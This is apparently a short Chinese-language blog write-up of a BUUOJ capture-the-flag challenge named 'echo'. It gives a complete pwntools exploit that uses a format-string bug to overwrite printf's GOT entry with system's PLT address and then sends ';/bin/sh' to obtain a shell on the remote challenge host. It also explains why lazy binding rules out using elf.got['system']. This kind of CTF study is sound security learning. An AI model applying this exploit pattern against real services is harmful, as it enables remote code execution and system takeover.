该篇博客探讨了在远程服务器上通过利用格式字符串漏洞(fmtstr_payload)来修改printf_got寄存器,使其指向system_plt的技巧。由于延迟绑定,直接使用elf.got['system']不可行,因为system函数尚未执行,got表中的地址未被填充。最终,通过注入payload并触发执行'/bin/sh'来实现命令执行。
WP
from pwn import*
p=remote('node4.buuoj.cn',25844)
context.log_level='debug'
elf=ELF("./echo")
printf_got=elf.got['printf']
system_plt=0x8048400#等价于elf.plt['system']
payload=fmtstr_payload(7,{printf_got:system_plt})
p.sendline(payload)
p.sendline(";/bin/sh\x00")
p.interactive()
值得注意的是为什么不用elf.got[‘system’]因为延迟绑定,system之前没有被执行过,所以elf.got表内的system地址没有被修改为真正地址。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
